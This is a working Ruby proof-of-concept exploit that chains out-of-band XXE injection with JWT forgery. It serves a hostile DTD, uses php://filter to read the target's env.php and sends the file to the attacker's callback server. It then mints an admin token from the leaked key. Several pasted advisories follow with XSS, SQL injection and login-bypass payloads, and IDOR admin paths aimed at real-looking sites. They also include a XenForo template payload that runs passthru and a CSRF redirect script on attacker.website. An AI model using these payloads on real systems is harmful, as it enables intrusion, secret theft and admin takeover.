#!/usr/bin/env ruby -W0
# -W0 silences Ruby warnings, including the "method redefined" warnings the
# nested `def`s inside jwt_encode would otherwise print on every call.
#
# Proof-of-concept that chains two weaknesses of a REST back end which hands a
# JSON field to an XML parser:
#   1. Out-of-band XML external entity (XXE) injection: the target is made to
#      fetch a DTD from a small web server this script forks, read its own
#      `../app/etc/env.php` through the `php://filter` base64 wrapper, and send
#      the encoded file back to that server inside a query string.
#   2. Token forgery: the `'key' => '...'` value found in the leaked file is
#      used as an HMAC-SHA256 secret to mint a JWT for an admin-type user, which
#      is then presented to an authenticated endpoint.
#
# Usage (see the `__FILE__ == $0` block): ARGV[0] is the target base URL,
# ARGV[1] is the URL (host and port) at which the target can reach this host.
#
# Observable indicators, all derived from what this script sends: a POST to
# `/rest/V1/guest-carts/1/estimate-shipping-methods` whose JSON contains a
# `sourceData` object with a `<!DOCTYPE` in `data` and a numeric `options`
# value; an outbound HTTP fetch of a `*.dtd` by the application server; and a
# follow-up request from the application server to that same external host
# carrying a long base64 query string. The parser option that enables entity
# substitution (LIBXML_NOENT) is taken from the request body here, which is the
# condition the XXE depends on. A signing key disclosed this way lets any
# holder mint valid tokens, so it has to be rotated, not just the hole closed.
#
# net/http, json, webrick, base64, openssl, timeout and uri are expected to be
# loaded by Bundler.require(:default) from a Gemfile that is not part of this
# listing.

require 'bundler'
Bundler.require(:default)

DEBUG = false          # extra stdout/stderr tracing (HTTP wire dump, WEBrick log)
USE_PROXY = false      # route the client through PROXY_ADDR:PROXY_PORT
PROXY_ADDR = '127.0.0.1'
PROXY_PORT = 8080

# Print `msg.inspect` to stdout, but only when DEBUG is on.
def debug(msg)
  puts msg.inspect if DEBUG
end

# Random ASCII-letter string of `length` characters (default 8).
# Uses Kernel#rand, not a CSPRNG; the values only need to be unpredictable
# enough to serve as one-off entity and parameter names.
def rand_text(length = 8)
  # random string generator
  o = [('a'..'z'), ('A'..'Z')].map(&:to_a).flatten
  (0...length).map { o[rand(o.length)] }.join
end

# The three names below are memoized so the DTD served by the callback server
# and the XML sent to the target agree on the same identifiers for the run.

# Name of the parameter entity declared in the external DTD.
def dtd_param_name
  @dtd_param_name ||= rand_text()
end

# Name of the general entity whose expansion triggers the callback request.
def ent_eval
  @ent_eval ||= rand_text()
end

# Query-string key under which the leaked (base64) file content arrives.
def leak_param_name
  @leak_param_name ||= rand_text()
end

# Base URL of the callback server as the target should see it. Always built
# with `http://`; the scheme given in ARGV[1] is ignored.
def remote_addr
  @remote_addr ||= "http://#{@srv_host.host}:#{@srv_host.port}"
end

# Memoized Net::HTTP client for @target_uri, optionally via the proxy above.
# TLS is switched on when the port is 443 or the target string contains
# "https"; certificate verification is disabled (VERIFY_NONE), so the client
# will happily talk to any intercepting endpoint.
def http
  @http ||= begin
    http = if USE_PROXY
      Net::HTTP.new(@target_uri.host, @target_uri.port, PROXY_ADDR, PROXY_PORT)
    else
      Net::HTTP.new(@target_uri.host, @target_uri.port)
    end

    if @target_uri.port == 443 || @target_uri.to_s.match(%r{http(s).*})
      http.use_ssl = true
      http.verify_mode = OpenSSL::SSL::VERIFY_NONE
    end

    # Dumps the full request/response exchange to stderr when DEBUG is set.
    http.set_debug_output($stderr) if DEBUG
    http
  end
end

# Text of the external DTD the callback server hands out for `*.dtd` paths.
# The first parameter entity reads the target's `../app/etc/env.php` through
# the php://filter base64 wrapper (base64 keeps the file's quotes and angle
# brackets from breaking the XML). The second parameter entity, once the
# target expands it, declares a general entity (`ent_eval`) whose SYSTEM
# identifier points back at remote_addr with the encoded file in the query
# string — that is the out-of-band exfiltration channel.
def make_xxe_dtd
  filter_path = 'php://filter/convert.base64-encode/resource=../app/etc/env.php'
  ent_file = rand_text()
  # Whitespace inside the %() literal is part of the served DTD body.
  %(
 <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">
 <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM '#{remote_addr}/?#{leak_param_name}=%#{ent_file};'>">
 )
end

# XML document placed in the JSON request. Its internal DTD subset declares a
# parameter entity pointing at `remote_addr/<random>.dtd`, expands it (which
# makes the target fetch the DTD above), then expands `dtd_param_name` from
# that DTD, and finally references `&ent_eval;` in the `<r>` element to fire
# the callback. Element and DOCTYPE names are random so no fixed signature
# appears in the body.
def xxe_xml_data()
  param_entity_name = rand_text()

  xml = "<?xml version='1.0' ?>"
  xml += "<!DOCTYPE #{rand_text()}"
  xml += '['
  xml += " <!ELEMENT #{rand_text()} ANY >"
  xml += " <!ENTITY % #{param_entity_name} SYSTEM '#{remote_addr}/#{rand_text}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "
  xml += ']'
  xml += "> <r>&#{ent_eval};</r>"

  xml
end

# libxml2 parser option bits, same values as PHP's constants of these names.
# NOENT substitutes entities (the bit the XXE needs); PARSEHUGE lifts the
# parser's size limits so a large base64 blob in an entity is accepted.
LIBXML_NOENT = 2
LIBXML_PARSEHUGE = 524288

# Send the XXE payload to the target and check that it was parsed.
# The XML travels under address.totalsCollector.collectorList.totalCollector
# .sourceData.{data,options}; the `sourceData` key is written with \u escapes,
# which Ruby resolves to the plain ASCII string before JSON encoding, so the
# escaping only hides the key in this source file, not on the wire.
# A random, capitalised field name (`signature`) is added to `address`; the
# method treats the run as successful only if the server answers 400 and
# echoes that name in `parameters.fieldName` — presumably its validation
# error for the unknown field, which shows the body was parsed.
# @raise [RuntimeError] if the status or the echoed field name differ.
def xxe_request()
  debug('Sending XXE request')

  signature = rand_text().capitalize

  post_data = {
    "address": {
      "#{signature}": rand_text(),
      "totalsCollector": {
        "collectorList": {
          "totalCollector": {
            "\u0073\u006F\u0075\u0072\u0063\u0065\u0044\u0061\u0074\u0061": {
              "data": xxe_xml_data(),
              "options": LIBXML_NOENT|LIBXML_PARSEHUGE
            }
          }
        }
      }
    }
  }.to_json
  req = Net::HTTP::Post.new('/rest/V1/guest-carts/1/estimate-shipping-methods')
  req.body = post_data
  req.content_type = 'application/json'
  # req.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)'
  res = http.request(req)

  raise RuntimeError, "Server returned unexpected response" unless res&.code == '400'

  body = JSON.parse(res.body)

  raise RuntimeError, "Server returned unexpected response" unless body['parameters']['fieldName'] == signature

end

# Claims placed in the forged token: user id 1 with the admin user type.
TARGET_USER_ID = 1

USER_TYPE_INTEGRATION = 1;
USER_TYPE_ADMIN = 2;
USER_TYPE_CUSTOMER = 3;
USER_TYPE_GUEST = 4;

# Build an HS256 JWT signed with `key`.
# @param key [String] HMAC secret recovered from the leaked configuration
# @param algorithm [String] accepted but unused — the header hard-codes HS256
# @return [String] header.payload.signature, base64url without padding
#
# The two nested `def`s are evaluated each time this method runs and define
# `pad_key`/`base64_url_encode` as methods on the enclosing object (Object),
# hence the redefinition warnings hidden by -W0. `pad_key` centres the key in
# a 2048-character string of '&'; presumably this mirrors how the target
# prepares its own HMAC key — confirm against the application before relying
# on it. The token is valid for ten days from issue.
def jwt_encode(key, algorithm = 'HS256')
  def pad_key(key, total_length, pad_char)
    left_padding = (total_length - key.length) / 2
    right_padding = total_length - key.length - left_padding
    pad_char * left_padding + key + pad_char * right_padding
  end
  header = {
    kid: "1",
    alg: "HS256"
  }

  payload = {
    uid: TARGET_USER_ID,
    utypid: USER_TYPE_ADMIN,
    iat: Time.now.to_i, # Token issue time
    exp: Time.now.to_i + 10 * 24 * 60 * 60, # Token expiration time (10 days)
  }

  def base64_url_encode(str)
    Base64.urlsafe_encode64(str).tr('=', '')
  end

  padded_key = pad_key(key, 2048, '&')

  encoded_header = base64_url_encode(header.to_json)
  encoded_payload = base64_url_encode(payload.to_json)

  # Create the signature
  data = "#{encoded_header}.#{encoded_payload}"
  signature = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), padded_key, data)
  encoded_signature = base64_url_encode(signature)

  # Combine the header, payload, and signature to form the JWT
  "#{encoded_header}.#{encoded_payload}.#{encoded_signature}"

end

# Orchestrates the run:
#   * forks a WEBrick server on 0.0.0.0:@srv_host.port (all interfaces) that
#     serves make_xxe_dtd for `*.dtd` paths and, for the callback request,
#     base64-decodes the `leak_param_name` query value into a pipe;
#   * sends the XXE request, reads the leaked file from the pipe with a
#     timeout, extracts `'key' => '...'`, forges a JWT and calls the coupons
#     search endpoint with it;
#   * always stops the child with SIGINT in `ensure`.
# Only RuntimeError (the "unexpected response" checks) is reported nicely;
# other exceptions propagate after cleanup.
def exploit()
  begin
    puts "Starting web server..."
    body = make_xxe_dtd()
    file_content = nil
    file_content_reader, file_content_writer = IO.pipe
    # The leaked file rides in the callback's query string, which is far
    # longer than WEBrick's default URI limit.
    WEBrick::HTTPRequest.const_set("MAX_URI_LENGTH", 10240)
    wbserver_options = {
      :BindAddress => '0.0.0.0',
      :Port => @srv_host.port,
      :Logger => WEBrick::Log.new($stderr, WEBrick::Log::DEBUG),
      :AccessLog => [],
      # :RequestTimeout => 300, # Increase request timeout
      # :RequestMaxUriLength => 100240 # Increase max URI length
    }
    wbserver_options[:Logger] = WEBrick::Log.new("/dev/null") unless DEBUG

    pid = Process.fork do
      # Child: keeps only the write end of the pipe.
      file_content_reader.close

      server = WEBrick::HTTPServer.new(wbserver_options)
      server.mount_proc '/' do |req, res|
        if req.path =~ /\.dtd$/
          res.body = body
        elsif req.query_string.match(/#{leak_param_name}=(.*)/)
          # This assignment lives in the forked child's memory; the parent
          # only ever sees what is written to the pipe below.
          file_content = Base64.decode64(Regexp.last_match(1))
          # puts "Received leaked file content:\n#{file_content}"
          file_content_writer.puts file_content

        else
          res.body = 'OK'
        end
      end
      # NOTE(review): a request with no query string leaves req.query_string
      # nil here, so `.match` would raise inside the handler — confirm.

      # Parent's `ensure` sends INT to stop the server.
      trap("INT") do
        server.shutdown
        file_content_writer.close
      end

      server.start
    end

    # Give the child a moment to bind before the target is asked to call back.
    sleep(1)
    xxe_request()
    file_content_writer.close

    begin
      # Set a timeout for reading from the pipe
      # NOTE(review): read_nonblock raises IO::WaitReadable immediately when
      # the pipe is empty (neither Timeout::Error nor EOFError), so the 5 s
      # window only bounds a read that already has data — confirm.
      Timeout.timeout(5) do # 5 seconds timeout, adjust as necessary
        file_content = file_content_reader.read_nonblock(10000) # Adjust the size as necessary
      end
    rescue Timeout::Error
      puts "Reading from pipe timed out."
    rescue EOFError
      puts "End of file reached."
    ensure
      file_content_reader.close
    end

    # Use file_content as needed here
    if file_content
      # puts "Successfully read file content:\n#{file_content}"
      # Greedy match on the first `'key' => '...'` line of the leaked config.
      # `[1]` on a nil MatchData raises NoMethodError, so the `else` branch
      # below is not reached when the pattern is absent.
      key = file_content.match(/'key' => '(.*)'/)[1]
      if key
        debug "Found key: #{key}"
        jwt = jwt_encode(key)
        puts "Generated JWT: #{jwt}"
        puts("Sending request with JWT to coupons endpoint")
        # Perform authenticated request to a admin endpoint
        res = http.request(Net::HTTP::Get.new('/rest/default/V1/coupons/search?searchCriteria=', {'Authorization' => "Bearer #{jwt}"}))
        raise RuntimeError, "Server returned unexpected response" unless res&.code == '200'
        puts "Available coupons:"
        puts JSON.pretty_generate(JSON.parse(res.body))
      else
        puts "Failed to extract key from file content."
      end
    else
      puts "Failed to read file content or content is empty."
    end

    puts "Exploit completed"

  rescue RuntimeError => e
    puts "#{e.class} - #{e.message}"
  ensure
    # pid is nil if the fork never happened; otherwise stop and reap the child.
    if pid
      Process.kill("INT", pid)
      Process.wait(pid)
    end
  end
end

# Entry point: ARGV[0] target base URL, ARGV[1] callback URL for this host.
if __FILE__ == $0
  @target_uri = URI.parse(ARGV[0])
  @srv_host = URI.parse(ARGV[1])

  exploit()
end
<pre><code>====================================================================================================================================<br />| # Title : Xhibiter NFT Marketplace 1.10.2 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : /search.php?id=1'%22()%26%25<acx><ScRiPt%20>prompt(915136)</ScRiPt><br /><br />[+] https://www/127.0.0.1/gatesea.io/search.php?id=1'"()%26%25<acx><ScRiPt >prompt(915136)</ScRiPt><br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : eStore CMS v2.0 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://www.2iraq.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : "CMS.php?CMS_P=" or "News_Details.php?ID="<===== inject here<br /><br />[+] https://www/127.0.0.1/uruk.edu.iq/News_Details.php?ID=467<br /><br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Clenix v1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits) |<br />| # Vendor : https://www.radiustheme.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : /admin/main.php<br /><br />[+] https://www/127.0.0.1/otabucert.co.uk/admin/main.php<br /><br />[+] Insecure Direct Object Reference : the application suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Candy Redis V2.1.2 HTML Form in redirect page Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://bacadigital.com/pasti-bisa-panduan-ujian-cbt-untuk-pengguna/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Vulnerability description :<br /><br /><br />An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.<br /> Therefore, browser users will not see the contents of this page and will not be able to interact with the HTML form. <br /><br />Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example: <br /><?php<br /> if (!isset($_SESSION["authenticated"])) {<br /> header("Location: auth.php");<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br />This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content of the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability. <br />The correct code would be <br /><br /><?php<br /> if (!isset($_SESSION[auth])) {<br /> header("Location: auth.php");<br /> exit();<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... 
form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br /><br />[+] infected item : /pass. <br /><br />[+] Attack details :<br /><br />Form action=''<br /><br />GET /pass/ HTTP/1.1<br />Pragma: no-cache<br />Cache-Control: no-cache<br />Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass<br />Acunetix-Aspect: enabled<br />Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c<br />Acunetix-Aspect-Queries: filelist;aspectalerts<br />Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f<br />Host: elearning7.smpn49-jkt.sch.id<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br />Accept: */*<br /><br />Response<br />HTTP/1.1 302 Found<br />Connection: Keep-Alive<br />Keep-Alive: timeout=5, max=100<br />x-powered-by: PHP/7.3.33<br />location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php<br />content-type: text/html; charset=UTF-8<br />content-length: 16992<br />vary: Accept-Encoding,User-Agent<br />date: Fri, 19 Jul 2024 10:09:49 GMT<br />server: LiteSpeed<br />cache-control: no-cache, no-store, must-revalidate, max-age=0<br />platform: hostinger<br />strict-transport-security: max-age=31536000; includeSubDomains; preload<br />x-xss-protection: 1; mode=block<br />x-content-type-options: nosniff<br />Original-Content-Encoding: gzip<br /><br />[+] The impact of this vulnerability : depends on the affected web application.<br /><br />[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page<br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Agop CMS v1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://gico.io/agop/demos/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Direct Object Reference : the application suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /admin/managePages.php<br /><br />[+] https://www/127.0.0.1/tiktrades.com/admin/managePages.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>-----------------------------------------------------------------------<br />XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability<br />-----------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://xenforo.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 2.2.15 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />XenForo implements a template system which gives complete control over<br />the layout of XenForo pages. Through these templates, it might be<br />possible to call certain "callback methods", however there is a sort<br />of "sandbox" which allows to solely call read-only methods: a method<br />is to be considered read-only when it begins with one of the allowed<br />prefixes, such as "get" or "filter". Malicious users might be able to<br />bypass this "sandbox" by abusing the getRepository() method from the<br />XF\Mvc\Entity\Manager class in order to get an instance object of the<br />XF\Util\Arr class, and from there they can abuse its filterRecursive()<br />static method in order to execute arbitrary callbacks or functions<br />(internally, this method calls the array_filter() PHP function with an<br />attacker-controlled "callback" parameter). As such, this can be<br />exploited to e.g. 
execute arbitrary OS commands by using a payload<br />like the following within a template, which will try to execute the<br />passthru() PHP function passing to it the string "whoami" as argument,<br />potentially resulting in the execution of the "whoami" command on the<br />web server:<br /><br />{{ $xf.app.em.getRepository('XF\Util\Arr').filterRecursive(['whoami'],'passthru')<br />}}<br /><br />Successful exploitation of this vulnerability requires an account with<br />permissions to administer styles or widgets.<br /><br /><br />[-] Solution:<br /><br />Update to a fixed version or apply the vendor patches.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure<br />[05/06/2024] - Vendor released patches and fixed versions<br />[14/06/2024] - CVE identifier requested<br />[16/06/2024] - CVE identifier assigned<br />[16/07/2024] - Coordinated public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org) has<br />assigned the name CVE-2024-38458 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://xenforo.com/community/threads/222133<br />https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2024-06<br /><br /></code></pre>
<pre><code>-------------------------------------------------------------------------------<br />XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability<br />-------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://xenforo.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 2.2.15 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The XF\Admin\Controller\Widget::actionSave() method, defined into the<br />/src/XF/Admin/Controller/Widget.php script, does not check whether the<br />current HTTP request is a POST or a GET before saving a widget.<br />XenForo does perform anti-CSRF checks for POST requests only, as such<br />this method can be abused in a Cross-Site Request Forgery (CSRF)<br />attack to create/modify arbitrary XenForo widgets via GET requests,<br />and this can also be exploited in tandem with KIS-2024-06 to perform<br />CSRF-based Remote Code Execution (RCE) attacks.<br /><br />Furthermore, XenForo implements a BB code system, as such this<br />vulnerability could also be exploited through "Stored CSRF" attacks by<br />abusing the [img] BB code tag, creating a thread or a private message<br />(to be sent to the victim user) like the following:<br /><br />[img]https://attacker.website/exploit.php[/img]<br /><br />Where the exploit.php script hosted on the attacker-controlled website<br />could be something like this:<br /><br /><?php<br /><br />$url = "https://victim.website/xenforo/";<br /><br />header("Location:<br />{$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");<br /><br />?><br /><br />Successful exploitation of this vulnerability requires a victim user<br />with permissions to administer styles or widgets to be currently<br />logged into the 
Admin Control Panel.<br /><br /><br />[-] Solution:<br /><br />Update to a fixed version or apply the vendor patches.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure<br />[05/06/2024] - Vendor released patches and fixed versions<br />[14/06/2024] - CVE identifier requested<br />[16/06/2024] - CVE identifier assigned<br />[16/07/2024] - Coordinated public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org) has<br />assigned the name CVE-2024-38457 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://xenforo.com/community/threads/222133<br />https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2024-05<br /><br /></code></pre>
<pre><code># Exploit Title: Hospital Management System Project in ASP.Net MVC - SQL<br />Injection / Authentication Bypass<br /># Date: 07/16/2024<br /># Exploit Author: 0xMykull<br /># Vendor Homepage:<br />https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/<br /># Software Link:<br />https://itsourcecode.com/free-projects/asp/hospital-management-system-project-in-asp-net-mvc-with-source-code/<br /># Version: 1<br /># CVE: CVE-2024-40502<br /><br />Description:<br />An SQL injection vulnerability has been discovered in the btn_login_b_Click<br />function of the affected web application. The vulnerability exists due to<br />the improper sanitization of user-supplied input in the login form.<br />Specifically, the txt_login_username.Text and txt_login_pass.Text fields<br />are concatenated directly into an SQL query string without proper<br />parameterization or escaping.<br /><br />Endpoint: https://localhost:44306/Users/Loginpage.aspx<br /><br />Bypass Payloads:<br /><br />(default user)<br />Username: kihsan'--<br />password: <anything><br /><br />Username: <anyvaliduser>'--<br />password: <anything><br /></code></pre>
<pre><code># Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path<br /># Discovery by: bios<br /># Discovery Date: 2024-15-07<br /># Vendor Homepage: https://developer.apple.com/bonjour/<br /># Tested Version: 3,0,0,10<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Microsoft Windows 10 Home<br /><br /># Step to discover Unquoted Service Path:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"<br />|findstr /i /v "c:\windows\\" |findstr /i /v """<br />Bonjour Service<br /> Bonjour Service<br />C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe<br /> Auto<br /><br />C:\>systeminfo<br /><br />Host Name: DESKTOP-HFBJOBG<br />OS Name: Microsoft Windows 10 Home<br />OS Version: 10.0.19045 N/A Build 19045<br /><br />PS C:\Program Files\Blizzard\Bonjour Service> powershell -command<br />"(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion"<br />>><br />3,0,0,10<br /><br />#Exploit:<br /><br />There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) .<br />This may allow an authorized local user to insert arbitrary code into the<br />unquoted service path and escalate privileges.<br /><br /></code></pre>